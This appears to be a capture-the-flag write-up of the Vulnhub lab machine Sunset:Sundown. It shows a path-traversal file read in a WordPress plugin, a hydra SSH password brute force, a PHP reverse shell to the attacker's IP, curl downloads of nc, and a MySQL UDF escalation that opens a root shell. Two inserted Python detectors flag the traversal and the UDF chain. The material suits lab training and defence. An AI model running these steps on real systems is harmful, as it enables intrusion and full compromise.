[VULNHUB] Sunset:Sundown

Today we are going to hack the Vulnhub machine called Potato. You can download it from the following link: https://www.vulnhub.com/entry/sunset-sundown,530/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.20
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-11 11:17 CEST
    Nmap scan report for 192.168.1.20
    Host is up (0.00028s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 90:ba:81:81:b6:ec:5b:33:87:f8:73:3d:82:ca:e5:dd (RSA)
    |   256 e1:bd:70:79:91:22:86:c8:e1:f5:80:ed:4a:b7:dd:ad (ECDSA)
    |_  256 9f:03:af:27:89:8a:8e:b5:c0:68:05:44:74:d3:6b:d7 (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-generator: WordPress 5.4.2
    | http-robots.txt: 1 disallowed entry
    |_/wp-admin/
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Sundown – Just another WordPress site
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds
    Nmap shows that robots.txt has one disallowed entry: /wp-admin. We explore with wpscan to see whether anything interesting turns up!
    ~ > wpscan --url http://192.168.1.20
    [WPScan ASCII banner]
    WordPress Security Scanner by the WPScan Team
    Version 3.8.6
    Sponsored by Automattic - https://automattic.com/
    @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________

    Interesting Finding(s):

    [+] Headers
     | Interesting Entry: Server: Apache/2.4.38 (Debian)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%

    [+] robots.txt found: http://192.168.1.20/robots.txt
     | Interesting Entries:
     |  - /wp-admin/
     |  - /wp-admin/admin-ajax.php
     | Found By: Robots Txt (Aggressive Detection)
     | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://192.168.1.20/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
     |  - http://codex.wordpress.org/XML-RPC_Pingback_API
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
     |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

    [+] WordPress readme found: http://192.168.1.20/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%

    [+] Upload directory has listing enabled: http://192.168.1.20/wp-content/uploads/
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%

    [+] The external WP-Cron seems to be enabled: http://192.168.1.20/wp-cron.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 60%
     | References:
     |  - https://www.iplocation.net/defend-wordpress-from-ddos
     |  - https://github.com/wpscanteam/wpscan/issues/1299

    [+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
     | Found By: Rss Generator (Passive Detection)
     |  - http://192.168.1.20/feed/, https://wordpress.org/?v=5.4.2
     |  - http://192.168.1.20/comments/feed/, https://wordpress.org/?v=5.4.2

    [+] Enumerating All Plugins (via Passive Methods)
    [+] Checking Plugin Versions (via Passive and Aggressive Methods)

    [i] Plugin(s) Identified:

    [+] wp-with-spritz
     | Location: http://192.168.1.20/wp-content/plugins/wp-with-spritz/
     | Latest Version: 1.0 (up to date)
     | Last Updated: 2015-08-20T20:15:00.000Z
     |
     | Found By: Urls In Homepage (Passive Detection)
     | Confirmed By: Urls In 404 Page (Passive Detection)
     |
     | Version: 4.2.4 (80% confidence)
     | Found By: Readme - Stable Tag (Aggressive Detection)
     |  - http://192.168.1.20/wp-content/plugins/wp-with-spritz/readme.txt

    [+] Finished: Fri Sep 11 11:18:58 2020
    [+] Requests Done: 52
    [+] Cached Requests: 7
    [+] Data Sent: 11.176 KB
    [+] Data Received: 300.866 KB
    [+] Memory used: 194.34 MB
    [+] Elapsed time: 00:00:08
    We see there is one plugin: wp-with-spritz. We look for more information about it and find that it is vulnerable[1]. Let's put it into practice :)

    http://192.168.1.20/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/passwd

    In the /etc/passwd file we can see that a user called carlos exists, so we check whether we can obtain his password using hydra.
    ~ > hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.1.20 ssh
    Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-11 11:26:55
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
    [DATA] attacking ssh://192.168.1.20:22/
    [22][ssh] host: 192.168.1.20   login: carlos   password: carlos
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-11 11:27:06
    We see that the password is the same as the username. We log in!
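    As an added defensive example (not part of the original write-up): the file read through the wp-with-spritz url parameter shown above leaves a clear trace in the Apache access log. This Python script parses combined-format log lines (a constructed sample, not a real capture) and flags spritz requests whose url value decodes to a path traversal or an absolute local path; the request path and parameter name come from the exploit URL above, everything else is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log: client ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SPRITZ_SCRIPT = "wp.spritz.content.filter.php"   # vulnerable endpoint seen in the write-up

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (%252e%252e -> ..) so double-encoded traversal is caught."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def classify_url_param(url_param):
    """Return a reason string if the url= value looks like a local file read, else None."""
    decoded = decode_fully(url_param).replace("\\", "/")
    if ".." in decoded.split("/"):
        return "path traversal"
    if decoded.startswith("/") and not decoded.startswith("//"):
        return "absolute local path"
    return None

def find_spritz_reads(log_lines):
    """Return (client_ip, status, decoded_url_param, reason) for each suspicious spritz request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(SPRITZ_SCRIPT):
            continue
        for url_param in parse_qs(parts.query).get("url", []):
            reason = classify_url_param(url_param)
            if reason:
                hits.append((m.group("ip"), int(m.group("status")), decode_fully(url_param), reason))
    return hits

# Constructed sample lines (not a real capture); the second mirrors the /etc/passwd read above.
SAMPLE_LOG = [
    '192.168.1.59 - - [11/Sep/2020:11:20:01 +0200] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://example.org/post HTTP/1.1" 200 1832 "-" "Mozilla/5.0"',
    '192.168.1.59 - - [11/Sep/2020:11:20:14 +0200] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/passwd HTTP/1.1" 200 1421 "-" "Mozilla/5.0"',
    '192.168.1.59 - - [11/Sep/2020:11:20:30 +0200] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1421 "-" "curl/7.68"',
    '192.168.1.59 - - [11/Sep/2020:11:21:00 +0200] "GET /robots.txt HTTP/1.1" 200 67 "-" "curl/7.68"',
]
```

    Running find_spritz_reads(SAMPLE_LOG) returns the two traversal requests and ignores the legitimate remote URL and the robots.txt fetch; the same logic applies to any plugin that takes a fetch target in a query parameter.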
  • Low Shell
  • ~ > ssh carlos@192.168.1.20
    carlos@192.168.1.20's password:
    Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Mon Aug 3 19:39:26 2020 from 192.168.100.139
    carlos@sundown:~$
  • user.txt
  • carlos@sundown:~$ cat local.txt
    28f84888f6bd690e321cba14659b32f2
    carlos@sundown:~$
    We want to read the wp-config.php file, which usually holds the password used to connect to mysql; however, our user carlos does not have permission to read it, but www-data does. We create a .php file reachable from the web that gives us a reverse shell, and that way we obtain the www-data user, which will let us read the file.
    carlos@sundown:/var/www/html/wordpress$ nano e.php
    carlos@sundown:/var/www/html/wordpress$ cat e.php
    & /dev/tcp/192.168.1.59/5555 0>&1'"); ?>
    carlos@sundown:/var/www/html/wordpress$
    We start nc listening.
    ~ > nc -nlvp 5555
    listening on [any] 5555 ...
    We browse to http://192.168.1.20/e.php
    ~ > nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.1.59] from (UNKNOWN) [192.168.1.20] 35710
    bash: cannot set terminal process group (503): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@sundown:/var/www/html/wordpress$ id
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@sundown:/var/www/html/wordpress$
    Now that we are the www-data user, we look at the wp-config.php file!
    www-data@sundown:/var/www/html/wordpress$ wp-config.php
    /** MySQL database password */
    define( 'DB_PASSWORD', 'VjFSQ2IyRnNUak5pZWpCTENnPT0K' );
    We see that we have the password to connect to mysql as root. On the other hand, we see that the mysql user has root permissions!
  • Privilege Escalation
  • We will use a UDF[2] to get a reverse shell through mysql and thus obtain a shell with root privileges. We download and compile it.
    wget http://0xdeadbeef.info/exploits/raptor_udf2.c
    gcc -g -c raptor_udf2.c
    gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
    We move the raptor_udf2.o file to our web server so that it is reachable.
    sudo mv raptor_udf2.o /var/www/html
    We download the nc binary and the raptor_udf2.o file we moved to our web server earlier.
    cd /tmp
    curl -o nc http://192.168.1.59/nc
    curl -o raptor_udf2.o http://192.168.1.59/raptor_udf2.o
    And now we begin the steps to obtain the reverse shell. We connect to mysql.
    carlos@sundown:/tmp$ mysql -u root -p
    Enter password:
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MariaDB connection id is 19
    Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    We select the mysql database.
    MariaDB [(none)]> use mysql;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Database changed
    We run the following statements.
    MariaDB [mysql]> create table foo(line blob);
    Query OK, 0 rows affected (0.029 sec)

    MariaDB [mysql]> insert into foo values(load_file('/tmp/raptor_udf2.so'));
    Query OK, 1 row affected (0.005 sec)

    MariaDB [mysql]> show variables like '%plugin%';
    +-----------------+---------------------------------------------+
    | Variable_name   | Value                                       |
    +-----------------+---------------------------------------------+
    | plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
    | plugin_maturity | gamma                                       |
    +-----------------+---------------------------------------------+
    2 rows in set (0.001 sec)

    MariaDB [mysql]> select * from foo into dumpfile "/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so";
    Query OK, 1 row affected (0.000 sec)

    MariaDB [mysql]> create function do_system returns integer soname 'raptor_udf2.so';
    Query OK, 0 rows affected (0.000 sec)

    MariaDB [mysql]> select * from mysql.func;
    +-----------+-----+----------------+----------+
    | name      | ret | dl             | type     |
    +-----------+-----+----------------+----------+
    | do_system |   2 | raptor_udf2.so | function |
    +-----------+-----+----------------+----------+
    1 row in set (0.000 sec)
    Once the previous steps are done, we start nc listening.
    ~ > nc -nlvp 4444
    listening on [any] 4444 ...
    Finally, in mysql we run:
    MariaDB [mysql]> select do_system('/tmp/nc 192.168.1.59 4444 -e /bin/bash &');
    And we get our privileged shell :)
    ~ > nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [192.168.1.59] from (UNKNOWN) [192.168.1.20] 49818
    id
    uid=0(root) gid=0(root) groups=0(root)
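    As an added defensive example (not from the write-up): the UDF chain above (load_file of a shared object, INTO DUMPFILE into plugin_dir, CREATE FUNCTION ... SONAME, then a call of the new function) is easy to spot in MariaDB's general query log when it is enabled. This Python script assumes the general-log line layout "TIME<TAB>ID Command<TAB>Argument", reuses the plugin_dir printed above, and runs over constructed log lines, not a capture.

```python
import re
from collections import defaultdict

# General log line: "YYMMDD HH:MM:SS<TAB>   ID Command<TAB>Argument" (time may be omitted on later lines)
LINE_RE = re.compile(r'^(?:\d{6} [\d:]{8})?\s*(?P<conn>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$')
PLUGIN_DIR = "/usr/lib/x86_64-linux-gnu/mariadb19/plugin/"   # value of plugin_dir shown above

# The three preparatory stages of the chain; each is matched once per connection.
STAGES = {
    "load_so":     re.compile(r"load_file\s*\(\s*'[^']*\.so'", re.I),
    "dump_plugin": re.compile(r"into\s+(?:dump|out)file\s+['\"]" + re.escape(PLUGIN_DIR), re.I),
    "create_udf":  re.compile(r"create\s+function\s+(?P<name>\w+)\s+returns\s+\w+\s+soname", re.I),
}

def scan_general_log(lines):
    """Return {conn_id: {"stages": [...], "udf": name or None, "called": bool}} for sessions
    that hit at least two stages of the UDF-loading chain."""
    sessions = defaultdict(lambda: {"stages": [], "udf": None, "called": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        conn, sql = m.group("conn"), m.group("arg")
        s = sessions[conn]
        for stage, rx in STAGES.items():
            hit = rx.search(sql)
            if hit and stage not in s["stages"]:
                s["stages"].append(stage)
                if stage == "create_udf":
                    s["udf"] = hit.group("name")
        # A call of the freshly created UDF is the execution step (the CREATE line has no "name(").
        if s["udf"] and re.search(r"\b" + re.escape(s["udf"]) + r"\s*\(", sql, re.I):
            s["called"] = True
    return {c: s for c, s in sessions.items() if len(s["stages"]) >= 2}

# Constructed log lines (not a capture): connection 19 replays the chain from this write-up,
# connection 20 is ordinary WordPress traffic and must not be reported.
SAMPLE_LOG = [
    "200911 11:30:01\t   19 Query\tcreate table foo(line blob)",
    "200911 11:30:05\t   19 Query\tinsert into foo values(load_file('/tmp/raptor_udf2.so'))",
    "200911 11:30:09\t   19 Query\tshow variables like '%plugin%'",
    "200911 11:30:20\t   19 Query\tselect * from foo into dumpfile \"/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so\"",
    "200911 11:30:31\t   19 Query\tcreate function do_system returns integer soname 'raptor_udf2.so'",
    "200911 11:31:02\t   19 Query\tselect do_system('id')",
    "200911 11:31:10\t   20 Query\tselect option_value from wp_options where option_name='siteurl'",
]
```

    The same chain is only possible because mysqld runs as root here and plugin_dir is writable by it; running the daemon as the mysql user and setting secure_file_priv removes the dumpfile step regardless of detection.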
  • root.txt
  • cd /root
    ls
    proof.txt
    cat proof.txt
    [ASCII art banner]
    510252fabb4b7e7dddd7373b7b3da3e8
    Thanks for playing - Felipe Winsnes (@whitecr0wz)
  • End
  • And with this we would be root on the machine.

    [1] https://www.exploit-db.com/exploits/44544
    [2] https://redteamnation.com/mysql-user-defined-functions/